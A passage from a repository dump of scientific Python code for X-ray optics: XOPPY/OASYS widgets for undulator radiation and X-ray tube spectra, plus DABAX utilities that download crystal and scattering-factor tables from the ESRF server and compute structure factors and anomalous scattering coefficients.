congruence.checkPositiveNumber(self.ELECTRONBEAMSIZEH, "Electron Beam Size H") self.ELECTRONBEAMSIZEV = congruence.checkPositiveNumber(self.ELECTRONBEAMSIZEV, "Electron Beam Size V") self.ELECTRONBEAMDIVERGENCEH = congruence.checkNumber(self.ELECTRONBEAMDIVERGENCEH, "Electron Beam Divergence H") self.ELECTRONBEAMDIVERGENCEV = congruence.checkNumber(self.ELECTRONBEAMDIVERGENCEV, "Electron Beam Divergence V") self.PERIODID = congruence.checkStrictlyPositiveNumber(self.PERIODID, "Period ID") self.NPERIODS = congruence.checkStrictlyPositiveNumber(self.NPERIODS, "Number of Periods") self.KV = congruence.checkPositiveNumber(self.KV, "Kv") self.KH = congruence.checkPositiveNumber(self.KH, "Kh") self.KPHASE = congruence.checkNumber(self.KPHASE, "KPHASE") self.DISTANCE = congruence.checkStrictlyPositiveNumber(self.DISTANCE, "Distance to slit") if self.SETRESONANCE == 0: self.GAPH = congruence.checkPositiveNumber(self.GAPH, "Slit gap H") self.GAPV = congruence.checkPositiveNumber(self.GAPV, "Slit gap V") self.PHOTONENERGYMIN = congruence.checkNumber(self.PHOTONENERGYMIN, "Photon Energy Min") self.PHOTONENERGYMAX = congruence.checkNumber(self.PHOTONENERGYMAX, "Photon Energy Max") congruence.checkGreaterOrEqualThan(self.PHOTONENERGYPOINTS, 2, "Number of Photon Energy Points", " 2") else: self.HARMONICNUMBER = congruence.checkStrictlyPositiveNumber(self.HARMONICNUMBER, "Harmonic number") self.HSLITPOINTS = congruence.checkStrictlyPositiveNumber(self.HSLITPOINTS, "Number of slit mesh points in H") self.VSLITPOINTS = congruence.checkStrictlyPositiveNumber(self.VSLITPOINTS, "Number of slit mesh points in V") if self.METHOD == 1: # URGENT congruence.checkLessOrEqualThan(self.HSLITPOINTS, 51, "Number of slit mesh points for URGENT "," 51") congruence.checkLessOrEqualThan(self.VSLITPOINTS, 51, "Number of slit mesh points for URGENT "," 51") def plot_results(self, calculated_data, progressBarValue=80): if not self.view_type == 0: if not calculated_data is None: self.initializeTabs() # added by srio to avoid overlapping graphs self.view_type_combo.setEnabled(False) p,e,h,v = calculated_data.get_content("xoppy_data") code = calculated_data.get_content("xoppy_code") try: self.plot_data3D(p, e, h, v, 0, 0, xtitle='H [mm]', ytitle='V [mm]', title='Code '+code+'; Flux [photons/s/0.1%bw/mm^2]',) self.tabs.setCurrentIndex(0) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) try: if len(e) > 1: energy_step = e[1]-e[0] else: energy_step = 1.0 self.plot_data2D(p.sum(axis=0)*energy_step*codata.e*1e3, h, v, 1, 0, xtitle='H [mm]', ytitle='V [mm]', title='Code '+code+'; Power density [W/mm^2]',) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) try: print("\nResult arrays (shapes): ",e.shape,h.shape,v.shape,p.shape) self.plot_data1D(e,p.sum(axis=2).sum(axis=1)*(h[1]-h[0])*(v[1]-v[0]), 2, 0, xtitle='Photon Energy [eV]', ytitle= 'Flux [photons/s/0.1%bw]', title='Code '+code+'; Flux',) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) try: print("\nResult arrays (shapes): ",e.shape,h.shape,v.shape,p.shape) self.plot_data1D(e,p.sum(axis=2).sum(axis=1)*(h[1]-h[0])*(v[1]-v[0])*codata.e*1e3, 3, 0, xtitle='Photon Energy [eV]', ytitle= 'Spectral power [W/eV]', title='Code '+code+'; Spectral power',) except Exception as e: self.view_type_combo.setEnabled(True) raise Exception("Data not plottable: bad content\n" + str(e)) self.view_type_combo.setEnabled(True) else: raise Exception("Empty Data") def do_xoppy_calculation(self): if self.H5_FILE_DUMP == 0: h5_file = "" else: h5_file = "undulator_radiation.h5" dict_parameters = { "ELECTRONENERGY" : self.ELECTRONENERGY, "ELECTRONENERGYSPREAD" : self.ELECTRONENERGYSPREAD, "ELECTRONCURRENT" : self.ELECTRONCURRENT, "ELECTRONBEAMSIZEH" : self.ELECTRONBEAMSIZEH, "ELECTRONBEAMSIZEV" : self.ELECTRONBEAMSIZEV, "ELECTRONBEAMDIVERGENCEH": self.ELECTRONBEAMDIVERGENCEH, "ELECTRONBEAMDIVERGENCEV": self.ELECTRONBEAMDIVERGENCEV, "PERIODID" : self.PERIODID, "NPERIODS" : self.NPERIODS, "KV" : self.KV, "KH" : self.KH, "KPHASE" : self.KPHASE, "DISTANCE" : self.DISTANCE, "SETRESONANCE" : self.SETRESONANCE, "HARMONICNUMBER" : self.HARMONICNUMBER, "GAPH" : self.GAPH, "GAPV" : self.GAPV, "HSLITPOINTS" : self.HSLITPOINTS, "VSLITPOINTS" : self.VSLITPOINTS, "METHOD" : self.METHOD, "PHOTONENERGYMIN" : self.PHOTONENERGYMIN, "PHOTONENERGYMAX" : self.PHOTONENERGYMAX, "PHOTONENERGYPOINTS" : self.PHOTONENERGYPOINTS, "USEEMITTANCES" : self.USEEMITTANCES, } # write python script self.xoppy_script.set_code(self.script_template().format_map(dict_parameters)) return xoppy_calc_undulator_radiation( ELECTRONENERGY = self.ELECTRONENERGY, ELECTRONENERGYSPREAD = self.ELECTRONENERGYSPREAD, ELECTRONCURRENT = self.ELECTRONCURRENT, ELECTRONBEAMSIZEH = self.ELECTRONBEAMSIZEH, ELECTRONBEAMSIZEV = self.ELECTRONBEAMSIZEV, ELECTRONBEAMDIVERGENCEH = self.ELECTRONBEAMDIVERGENCEH, ELECTRONBEAMDIVERGENCEV = self.ELECTRONBEAMDIVERGENCEV, PERIODID = self.PERIODID, NPERIODS = self.NPERIODS, KV = self.KV, KH = self.KH, KPHASE = self.KPHASE, DISTANCE = self.DISTANCE, SETRESONANCE = self.SETRESONANCE, HARMONICNUMBER = self.HARMONICNUMBER, GAPH = self.GAPH, GAPV = self.GAPV, HSLITPOINTS = self.HSLITPOINTS, VSLITPOINTS = self.VSLITPOINTS, METHOD = self.METHOD, PHOTONENERGYMIN = self.PHOTONENERGYMIN, PHOTONENERGYMAX = self.PHOTONENERGYMAX, PHOTONENERGYPOINTS = self.PHOTONENERGYPOINTS, USEEMITTANCES = self.USEEMITTANCES, h5_file = h5_file, h5_entry_name = "XOPPY_RADIATION", h5_initialize = True, h5_parameters = dict_parameters, ) def script_template(self): return """ # # script to make the calculations (created by XOPPY:undulator_radiation) # from orangecontrib.xoppy.util.xoppy_undulators import xoppy_calc_undulator_radiation h5_parameters = dict() h5_parameters["ELECTRONENERGY"] = {ELECTRONENERGY} h5_parameters["ELECTRONENERGYSPREAD"] = {ELECTRONENERGYSPREAD} h5_parameters["ELECTRONCURRENT"] = {ELECTRONCURRENT} h5_parameters["ELECTRONBEAMSIZEH"] = {ELECTRONBEAMSIZEH} h5_parameters["ELECTRONBEAMSIZEV"] = {ELECTRONBEAMSIZEV} h5_parameters["ELECTRONBEAMDIVERGENCEH"] = {ELECTRONBEAMDIVERGENCEH} h5_parameters["ELECTRONBEAMDIVERGENCEV"] = {ELECTRONBEAMDIVERGENCEV} h5_parameters["PERIODID"] = {PERIODID} h5_parameters["NPERIODS"] = {NPERIODS} h5_parameters["KV"] = {KV} h5_parameters["KH"] = {KH} h5_parameters["KPHASE"] = {KPHASE} h5_parameters["DISTANCE"] = {DISTANCE} h5_parameters["SETRESONANCE"] = {SETRESONANCE} h5_parameters["HARMONICNUMBER"] = {HARMONICNUMBER} h5_parameters["GAPH"] = {GAPH} h5_parameters["GAPV"] = {GAPV} h5_parameters["HSLITPOINTS"] = {HSLITPOINTS} h5_parameters["VSLITPOINTS"] = {VSLITPOINTS} h5_parameters["METHOD"] = {METHOD} h5_parameters["PHOTONENERGYMIN"] = {PHOTONENERGYMIN} h5_parameters["PHOTONENERGYMAX"] = {PHOTONENERGYMAX} h5_parameters["PHOTONENERGYPOINTS"] = {PHOTONENERGYPOINTS} h5_parameters["USEEMITTANCES"] = {USEEMITTANCES} e, h, v, p, code = xoppy_calc_undulator_radiation( ELECTRONENERGY = h5_parameters["ELECTRONENERGY"] , ELECTRONENERGYSPREAD = h5_parameters["ELECTRONENERGYSPREAD"] , ELECTRONCURRENT = h5_parameters["ELECTRONCURRENT"] , ELECTRONBEAMSIZEH = h5_parameters["ELECTRONBEAMSIZEH"] , ELECTRONBEAMSIZEV = h5_parameters["ELECTRONBEAMSIZEV"] , ELECTRONBEAMDIVERGENCEH = h5_parameters["ELECTRONBEAMDIVERGENCEH"], ELECTRONBEAMDIVERGENCEV = h5_parameters["ELECTRONBEAMDIVERGENCEV"], PERIODID = h5_parameters["PERIODID"] , NPERIODS = h5_parameters["NPERIODS"] , KV = h5_parameters["KV"] , KH = h5_parameters["KH"] , KPHASE = h5_parameters["KPHASE"] , DISTANCE = h5_parameters["DISTANCE"] , SETRESONANCE = h5_parameters["SETRESONANCE"] , HARMONICNUMBER = h5_parameters["HARMONICNUMBER"] , GAPH = h5_parameters["GAPH"] , GAPV = h5_parameters["GAPV"] , HSLITPOINTS = h5_parameters["HSLITPOINTS"] , VSLITPOINTS = h5_parameters["VSLITPOINTS"] , METHOD = h5_parameters["METHOD"] , PHOTONENERGYMIN = h5_parameters["PHOTONENERGYMIN"] , PHOTONENERGYMAX = h5_parameters["PHOTONENERGYMAX"] , PHOTONENERGYPOINTS = h5_parameters["PHOTONENERGYPOINTS"] , USEEMITTANCES = h5_parameters["USEEMITTANCES"] , h5_file = "undulator_radiation.h5", h5_entry_name = "XOPPY_RADIATION", h5_initialize = True, h5_parameters = h5_parameters, ) # example plot from srxraylib.plot.gol import plot_image plot_image(p[0],h,v,title="Flux [photons/s] per 0.1 bw per mm2 at %9.3f eV"%({PHOTONENERGYMIN}),xtitle="H [mm]",ytitle="V [mm]") # # end script # """ def extract_data_from_xoppy_output(self, calculation_output): e, h, v, p, code = calculation_output calculated_data = DataExchangeObject("XOPPY", self.get_data_exchange_widget_name()) calculated_data.add_content("xoppy_data", [p, e, h, v]) calculated_data.add_content("xoppy_code", code) return calculated_data def get_data_exchange_widget_name(self): return "UNDULATOR_RADIATION" def getTitles(self): return ['Undulator Flux vs E,X,Y','Undulator Power Density vs X,Y','Undulator Flux vs E','Undulator Spectral Power vs E'] def receive_syned_data(self, data): if isinstance(data, synedb.Beamline): if not data._light_source is None and isinstance(data._light_source._magnetic_structure, synedid.InsertionDevice): light_source = data._light_source self.ELECTRONENERGY = light_source._electron_beam._energy_in_GeV self.ELECTRONENERGYSPREAD = light_source._electron_beam._energy_spread self.ELECTRONCURRENT = light_source._electron_beam._current x, xp, y, yp = light_source._electron_beam.get_sigmas_all() self.ELECTRONBEAMSIZEH = x self.ELECTRONBEAMSIZEV = y self.ELECTRONBEAMDIVERGENCEH = xp self.ELECTRONBEAMDIVERGENCEV = yp self.PERIODID = light_source._magnetic_structure._period_length self.NPERIODS = light_source._magnetic_structure._number_of_periods self.KV = light_source._magnetic_structure._K_vertical self.KH = light_source._magnetic_structure._K_horizontal # TODO: self.KPHASE = ... define and import it in SYNED self.set_enabled(False) else: self.set_enabled(True) # raise ValueError("Syned data not correct") else: self.set_enabled(True) # raise ValueError("Syned data not correct") def set_enabled(self,value): if value == True: self.id_ELECTRONENERGY.setEnabled(True) self.id_ELECTRONENERGYSPREAD.setEnabled(True) self.id_ELECTRONBEAMSIZEH.setEnabled(True) self.id_ELECTRONBEAMSIZEV.setEnabled(True) self.id_ELECTRONBEAMDIVERGENCEH.setEnabled(True) self.id_ELECTRONBEAMDIVERGENCEV.setEnabled(True) self.id_ELECTRONCURRENT.setEnabled(True) self.id_PERIODID.setEnabled(True) self.id_NPERIODS.setEnabled(True) self.id_KV.setEnabled(True) self.id_KH.setEnabled(True) else: self.id_ELECTRONENERGY.setEnabled(False) self.id_ELECTRONENERGYSPREAD.setEnabled(False) self.id_ELECTRONBEAMSIZEH.setEnabled(False) self.id_ELECTRONBEAMSIZEV.setEnabled(False) self.id_ELECTRONBEAMDIVERGENCEH.setEnabled(False) self.id_ELECTRONBEAMDIVERGENCEV.setEnabled(False) self.id_ELECTRONCURRENT.setEnabled(False) self.id_PERIODID.setEnabled(False) self.id_NPERIODS.setEnabled(False) self.id_KV.setEnabled(False) self.id_KH.setEnabled(False) if __name__ == "__main__": bl = None LOAD_REMOTE_BEAMLINE = False if LOAD_REMOTE_BEAMLINE: try: from syned.util.json_tools import load_from_json_file, load_from_json_url from syned.storage_ring.light_source import LightSource from syned.beamline.beamline import Beamline remote_file_name = "http://ftp.esrf.eu/pub/scisoft/syned/lightsources/ESRF_ID21_EBS_ppu42_17.json" remote_file_name = "http://ftp.esrf.eu/pub/scisoft/syned/lightsources/ESRF_ID21_LowBeta_ppu42_17.json" tmp = load_from_json_url(remote_file_name) if isinstance(tmp,LightSource): bl = Beamline(tmp) except: pass app = QApplication(sys.argv) w = OWundulator_radiation() if bl is not None: w.receive_syned_data(bl) w.show() app.exec() w.saveSettings() ``` #### File: widgets/source/xtubes.py ```python import sys, os import platform from PyQt5.QtWidgets import QApplication from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import gui as oasysgui, congruence from orangecontrib.xoppy.util.xoppy_util import locations from orangecontrib.xoppy.widgets.gui.ow_xoppy_widget import XoppyWidget class OWxtubes(XoppyWidget): name = "Tubes" id = "orange.widgets.dataxtubes" description = "X-ray tube Spectrum (Mo,Rh,W)" icon = "icons/xoppy_xtubes.png" priority = 15 category = "" keywords = ["xoppy", "xtubes"] ITUBE = Setting(0) VOLTAGE = Setting(30.0) def build_gui(self): box = oasysgui.widgetBox(self.controlArea, self.name + " Input Parameters",orientation="vertical", width=self.CONTROL_AREA_WIDTH-5) idx = -1 #widget index 0 idx += 1 box1 = gui.widgetBox(box) gui.comboBox(box1, self, "ITUBE", label=self.unitLabels()[idx], addSpace=False, items=['Mo', 'Rh', 'W'], valueType=int, orientation="horizontal", labelWidth=330) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) oasysgui.lineEdit(box1, self, "VOLTAGE", label=self.unitLabels()[idx], addSpace=False, valueType=float, orientation="horizontal", labelWidth=250) self.show_at(self.unitFlags()[idx], box1) def unitLabels(self): return ['Target element ','Voltage [kV] (18<V<42)'] def unitFlags(self): return ['True','True'] def get_help_name(self): return 'xtubes' def check_fields(self): if self.VOLTAGE <= 18 or self.VOLTAGE >= 42: raise Exception("Voltage out of range") def do_xoppy_calculation(self): return xoppy_calc_xtubes(ITUBE=self.ITUBE,VOLTAGE=self.VOLTAGE) def get_data_exchange_widget_name(self): return "XTUBES" def getTitles(self): return ['X-Ray Tube Spectrum'] def getXTitles(self): return ["Energy [eV]"] def getYTitles(self): return ["Fluence [photons/s/mm^2/0.5keV(bw)/mA]"] # -------------------------------------------------------------------------------------------- # -------------------------------------------------------------------------------------------- def xoppy_calc_xtubes(ITUBE=0,VOLTAGE=30.0): print("Inside xoppy_calc_xtubes. ") for file in ["xtubes_tmp.dat"]: try: os.remove(os.path.join(locations.home_bin_run(),file)) except: pass try: with open("xoppy.inp","wt") as f: f.write("%d\n%f\n"%(ITUBE+1,VOLTAGE)) if platform.system() == "Windows": command = "\"" + os.path.join(locations.home_bin(),'xtubes.exe\" < xoppy.inp') else: command = "'" + os.path.join(locations.home_bin(), "xtubes") + "' < xoppy.inp" print("Running command '%s' in directory: %s "%(command, locations.home_bin_run())) print("\n--------------------------------------------------------\n") os.system(command) print("\n--------------------------------------------------------\n") return os.path.join(locations.home_bin_run(), "xtubes_tmp.dat") except Exception as e: raise e if __name__ == "__main__": app = QApplication(sys.argv) w = OWxtubes() w.show() app.exec() w.saveSettings() ```
{ "source": "91902078/yb66", "score": 3 }
#### File: yb66/backup/SymbolToFromAtomicNumber.py ```python def SymbolToFromAtomicNumber(ATOM): atoms = [ [1,"H"],[2,"He"],[3,"Li"],[4,"Be"],[5,"B"],[6,"C"],[7,"N"],[8,"O"],[9,"F"],[10,"Ne"], \ [11,"Na"],[12,"Mg"],[13,"Al"],[14,"Si"],[15,"P"],[16,"S"],[17,"Cl"],[18,"Ar"],[19,"K"],[20,"Ca"], \ [21,"Sc"],[22,"Ti"],[23,"V"],[24,"Cr"],[25,"Mn"],[26,"Fe"],[27,"Co"],[28,"Ni"],[29,"Cu"],[30,"Zn"], \ [31,"Ga"],[32,"Ge"],[33,"As"],[34,"Se"],[35,"Br"],[36,"Kr"],[37,"Rb"],[38,"Sr"],[39,"Y"],[40,"Zr"], \ [41,"Nb"],[42,"Mo"],[43,"Tc"],[44,"Ru"],[45,"Rh"],[46,"Pd"],[47,"Ag"],[48,"Cd"],[49,"In"],[50,"Sn"], \ [51,"Sb"],[52,"Te"],[53,"I"],[54,"Xe"],[55,"Cs"],[56,"Ba"],[57,"La"],[58,"Ce"],[59,"Pr"],[60,"Nd"], \ [61,"Pm"],[62,"Sm"],[63,"Eu"],[64,"Gd"],[65,"Tb"],[66,"Dy"],[67,"Ho"],[68,"Er"],[69,"Tm"],[70,"Yb"], \ [71,"Lu"],[72,"Hf"],[73,"Ta"],[74,"W"],[75,"Re"],[76,"Os"],[77,"Ir"],[78,"Pt"],[79,"Au"],[80,"Hg"], \ [81,"Tl"],[82,"Pb"],[83,"Bi"],[84,"Po"],[85,"At"],[86,"Rn"],[87,"Fr"],[88,"Ra"],[89,"Ac"],[90,"Th"], \ [91,"Pa"],[92,"U"],[93,"Np"],[94,"Pu"],[95,"Am"],[96,"Cm"],[97,"Bk"],[98,"Cf"],[99,"Es"],[100,"Fm"], \ [101,"Md"],[102,"No"],[103,"Lr"],[104,"Rf"],[105,"Db"],[106,"Sg"],[107,"Bh"] ] if isinstance(ATOM,int): for a in atoms: if a[0] == ATOM: return a[1] for a in atoms: if a[1] == ATOM: return int(a[0]) raise Exception("Why are you here?") ``` #### File: yb66/yb66/dabax_util.py ```python import os import numpy from urllib.request import urlretrieve from silx.io.specfile import SpecFile from orangecontrib.xoppy.util.xoppy_xraylib_util import bragg_metrictensor, interface_reflectivity from scipy.optimize import curve_fit import scipy.constants as codata # global default dabax_repository dabax_repository="http://ftp.esrf.eu/pub/scisoft/DabaxFiles/" ######################### # common access tools ######################### def get_dabax_file(filename, dabax_repository=dabax_repository, verbose=True): # # file exists in current directory # if os.path.exists(filename): if verbose: print("Dabax file exists in local directory: %s " % filename) return filename # # download remote file # if dabax_repository[0:3] == "htt" or dabax_repository[0:3] == "ftp": try: filepath, http_msg = urlretrieve(dabax_repository + filename, filename=filename, reporthook=None, data=None) if verbose: print("Dabax file %s downloaded from %s" % (filepath, dabax_repository + filename)) return filename except: raise Exception("Failed to download file %s from %s" % (filename, dabax_repository)) # # file exists in local repository # f1 = os.path.join(dabax_repository,filename) if os.path.exists(f1): if verbose: print("Dabax file exists in local directory: %s " % f1) return f1 raise Exception(FileNotFoundError) ######################### # crystal ######################### def Crystal_GetCrystal(entry_name='YB66', filename='Crystals.dat', dabax_repository=dabax_repository, verbose=True): """ parse a complex crystal structure file into a dictionary (like xraylib.Crystal_GetCrystal('Si')) it has an additional fiels for each atom: the charge return a dictionary containing crystal infomation """ file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] if name.split(' ')[1] == entry_name: flag_found = True index_found = index if not flag_found: raise (Exception("Entry name not found: %s" % entry_name)) cryst = {'name':entry_name} #returned dictionary like that one created by xraylib.Crystal_GetCrystal(descriptor) cell_parameters = sf[index_found].scan_header_dict["UCELL"] cell_parameters = ' '.join(cell_parameters.split()) # remove multiple blanks a = cell_parameters.split(' ') cryst['a'] = float(a[0]) cryst['b'] = float(a[1]) cryst['c'] = float(a[2]) cryst['alpha'] = float(a[3]) cryst['beta'] = float(a[4]) cryst['gamma'] = float(a[5]) volume = bragg_metrictensor(float(a[0]), float(a[1]), float(a[2]), float(a[3]), float(a[4]), float(a[5]), RETURN_VOLUME=1) cryst['volume'] = volume cell_data = numpy.array(sf[index_found].data) cryst['n_atom'] = cell_data.shape[1] atom = [] for i in range(cell_data.shape[1]): if cell_data.shape[0] == 5: # standard 5 columns # not here, this info is not in the dabax file # s = symbol_to_from_atomic_number(int(cell_data[0,i])) atom.append({ 'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i], 'charge': 0.0,}) else: # 6 columns (charge) #'AtomicName' required to compatible my current code # s = symbol_to_from_atomic_number(int(cell_data[0,i])) # if cell_data[5, i] != 0: #charged # s = s + f'%+.6g'%cell_data[5, i] atom.append({ # 'AtomicName': s, 'Zatom':int(cell_data[0,i]), 'fraction':cell_data[1,i], 'x': cell_data[2,i], 'y': cell_data[3, i], 'z': cell_data[4, i], 'charge': cell_data[5, i],}) cryst['atom'] = atom cryst['cpointer'] = None ANISO_KEY = "UANISO_COFF" #prefix for a line with anisotropic coefficients d = sf[index_found].scan_header_dict AnisoItem = {'Name': ' ', 'start': 0, 'end': 0, 'beta11': 0.0, 'beta22': 0.0, 'beta33': 0.0, 'beta12': 0.0, 'beta13': 0.0, 'beta23': 0.0} a=[ (x, d[x].split()) for x in d if x[:len(ANISO_KEY)] == ANISO_KEY] if len(a) >0: #found Anisotropic coefficients in the header, process it a=sorted(a,key=lambda x:int(x[1][0]),reverse=False) #sort 'Start' ascendant, avoid order changed by the SpecFile n = 0 Aniso = [] for x in a: #tuple('UANISO_COFF_B1',[1 96 0.00038 0.00044 0.00039 0 0 0]) AnisoItem['Name']= x[0][len(ANISO_KEY)+1:] #get site atom name starting from 13th character 'B1', etc AnisoItem['start']= int(x[1][0]) AnisoItem['end']= int(x[1][1]) AnisoItem['beta11']= float(x[1][2]) AnisoItem['beta22']= float(x[1][3]) AnisoItem['beta33']= float(x[1][4]) AnisoItem['beta12']= float(x[1][5]) AnisoItem['beta13']= float(x[1][6]) AnisoItem['beta23']= float(x[1][7]) Aniso.append(AnisoItem.copy()) n = n + 1 cryst['Aniso'] = Aniso #if having key 'Ansio' when there is anisotropic data,otherwise no cryst['n_aniso']= n else: #create a dummy Aniso to compatible with xraylib cryst['Aniso'] = [AnisoItem.copy()] cryst['n_aniso']= 1 return cryst def Crystal_GetCrystalsList(dabax_repository=dabax_repository, verbose=True): """ get crystal names from crystals.dat """ file1 = get_dabax_file('Crystals.dat', dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) crystals = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] crystals.append(name.split(' ')[1]) return crystals # # dabax crystal functions with the same interface as xraylib # # # # TODO: # F_0 = xraylib.Crystal_F_H_StructureFactor(_crystal, E_keV, h, k, l, _debyeWaller, 1.0) # # F_H = xraylib.Crystal_F_H_StructureFactor(_crystal, E_keV, h, k, l, _debyeWaller, 1.0) # def Crystal_dSpacing(cryst, h, k, l): return bragg_metrictensor(cryst['a'], cryst['b'], cryst['c'], cryst['alpha'], cryst['beta'], cryst['gamma'], HKL=[h, k, l]) def Bragg_angle(cryst, E_keV, h, k, l): dspacing = Crystal_dSpacing(cryst, h, k, l) # in A wavelength = codata.h * codata.c / codata.e / (E_keV * 1e3) * 1e10 # in A return numpy.arcsin(wavelength / 2 / dspacing) ######################### # f0 ######################### def get_f0_coeffs_from_dabax_file(entry_name="Y3+", filename="f0_InterTables.dat", dabax_repository=dabax_repository, verbose=True): file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] if name.split(' ')[1] == entry_name: flag_found = True index_found = index if flag_found: return (sf[index_found].data)[:,0] else: return [] def f0_with_fractional_charge(Z, charge=0.0, filename="f0_InterTables.dat", dabax_repository=dabax_repository, verbose=True): symbol = atomic_symbols_dabax()[Z] if charge == 0.0: return get_f0_coeffs_from_dabax_file(entry_name=symbol, filename=filename, dabax_repository=dabax_repository) else: # retrieve all entries filename = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(filename) # retrieve all entries entries = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] entries.append(name.split(' ')[1]) # identify the entries that match the symbol interesting_entries = [] charge_list = [] index_list = [] for i,entry in enumerate(entries): if entry.find(symbol) == 0: if entry == symbol: interesting_entries.append(entry) charge_list.append(0.0) index_list.append(i) else: entry2 = entry.replace(symbol,'') try: charge_item = int(entry2[::-1]) # convert to integer the reversed string charge_list.append(charge_item) interesting_entries.append(entry) index_list.append(i) except: pass # retrieve coefficients from these interesting entries coefficient_list = [] for i in index_list: coefficient_list.append((sf[i].data)[:, 0]) return __f0_interpolate_coefficients(charge, interesting_entries, charge_list, coefficient_list, verbose=verbose) def calculate_f0_from_f0coeff(f0coeff, ratio): icentral = len(f0coeff) // 2 F0 = f0coeff[icentral] for i in range(icentral): F0 += f0coeff[i] * numpy.exp(-1.0 * f0coeff[i + icentral + 1] * ratio ** 2) return F0 # # __* are auxiliar routines not to be exported outside # def __f0_interpolate_coefficients(charge, interesting_entries, charge_list, coefficient_list, verbose=True): # # f0 data # nitems = len(interesting_entries) if nitems == 1: print("Warning: no interpolating of charge: only one value available for ", interesting_entries[0]) return coefficient_list[0] charge_list_difference = [] for i in range(nitems): charge_list_difference.append(charge_list[i] - charge) charge_list_difference = numpy.array(charge_list_difference) # convert to numpy array if numpy.abs(charge_list_difference).min() == 0: idx = numpy.abs(charge_list_difference).argmin() if verbose: print("No interpolating needed: returning value for ", interesting_entries[idx]) return coefficient_list[idx] # get the closer charge values, no matter of the sign sorted_indices = numpy.argsort(numpy.abs(charge_list_difference)) sorted_index_0 = sorted_indices[0] sorted_index_1 = sorted_indices[1] delta_data = charge_list[sorted_index_1] - charge_list[sorted_index_0] delta_charge = charge - charge_list[sorted_index_0] delta = delta_charge / delta_data if verbose: print("Interpolating charge %g = %s + %g (%s - %s)" % (charge, interesting_entries[sorted_index_0], delta, interesting_entries[sorted_index_1], interesting_entries[sorted_index_0])) # interpolate to get the f0 for the wanted charge q = numpy.linspace(0.0, 2.0, 100) f0_0 = calculate_f0_from_f0coeff(coefficient_list[sorted_index_0], q) f0_1 = calculate_f0_from_f0coeff(coefficient_list[sorted_index_1], q) f0 = f0_0 + delta * (f0_1 - f0_0) # # fit # try: popt, pcov = curve_fit(__f0func, q, f0, p0=coefficient_list[sorted_index_0], maxfev=20000) if verbose: print("fitted: ", popt) return popt except: if verbose: print("Error: failed to fit coefficients for fractional charge. Returning the ones of ", interesting_entries[sorted_index_0]) return coefficient_list[sorted_index_0] def __f0func(q, a1, a2, a3, a4, a5, a6, a7, a8, a9): return calculate_f0_from_f0coeff([a1, a2, a3, a4, a5, a6, a7, a8, a9], q) ######################### # f1f2 ######################### def f1f2_calc_dabax(descriptor, energy, theta=3.0e-3, F=0, density=None, rough=0.0, verbose=True, filename="f1f2_Windt.dat", dabax_repository=dabax_repository, interpolation_log=False): """ calculate the elastic Photon-Atom anonalous f1 and f2 coefficients as a function of energy. It also gives the refractive index components delta and beta (n=1-delta - i beta), the absorption photoelectric coefficient and the reflectivities (s,p and unpolarized). :param descriptor: string with the element symbol or integer with Z :param energy: array with energies (eV) :param theta: array with grazing angles (rad) :param F: calculation flag: F=0 (default) returns a 2-col array with f1 and f2 F=1 returns f1 F=2 returns f2 F=3 returns delta [n = 1 -delta -i beta] F=4 returns betaf [n = 1 -delta -i beta] F=5 returns Photoelectric linear absorption coefficient F=6 returns Photoelectric mass absorption coefficient F=7 returns Photoelectric Cross Section F=8 returns s-polarized reflectivity F=9 returns p-polarized reflectivity F=10 returns unpolarized reflectivity F=11 returns delta/betaf :param density: the density to be used for some calculations. If None, get it from xraylib :param rough: the roughness RMS in Angstroms for reflectivity calculations :return: a numpy array with results """ energy = numpy.array(energy,dtype=float).reshape(-1) theta = numpy.array(theta,dtype=float).reshape(-1) if isinstance(descriptor,str): Z = atomic_number_dabax(descriptor) symbol = descriptor else: Z = descriptor symbol = atomic_symbols_dabax(descriptor) if density is None: density = element_density_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) if verbose: print("f1f2_calc: using density: %f g/cm3" % density) # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] line = " ".join(name.split()) if (line.split(' ')[1]) == descriptor: flag_found = True index_found = index if not flag_found: raise (Exception("Entry name not found: %s" % descriptor)) zadd = sf[index_found].scan_header_dict["UF1ADD"] data = sf[index_found].data L = sf.labels(index_found) photon_energy = data[0, :].copy() if filename in ['f1f2_asf_Kissel.dat','f1f2_Chantler.dat']: photon_energy *= 1e3 if filename == 'f1f2_asf_Kissel.dat': f1 = data[4,:].copy() f2 = numpy.abs(data[1,:].copy()) else: f1 = data[1, :].copy() f2 = data[2, :].copy() if interpolation_log: f1_interpolated = 10 ** numpy.interp(numpy.log10(energy), numpy.log10(photon_energy), numpy.log10(numpy.abs(f1))) f2_interpolated = 10 ** numpy.interp(numpy.log10(energy), numpy.log10(photon_energy), numpy.log10(numpy.abs(f2))) else: f1_interpolated = numpy.interp(energy, photon_energy, f1) f2_interpolated = numpy.interp(energy, photon_energy, f2) if zadd != 0: # adds Z if not included in the data f1_interpolated += float(zadd) if F == 0: # F=0 (default) returns a 2-col array with f1 and f2 out = numpy.zeros((2,energy.size)) out[0,:] = f1_interpolated out[1,:] = f2_interpolated return out elif F == 1: # F=1 returns f1 return f1_interpolated elif F == 2: # F=2 returns f2 return f2_interpolated # atwt = xraylib.AtomicWeight(Z) atwt = atomic_weights_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) avogadro = codata.Avogadro toangstroms = codata.h * 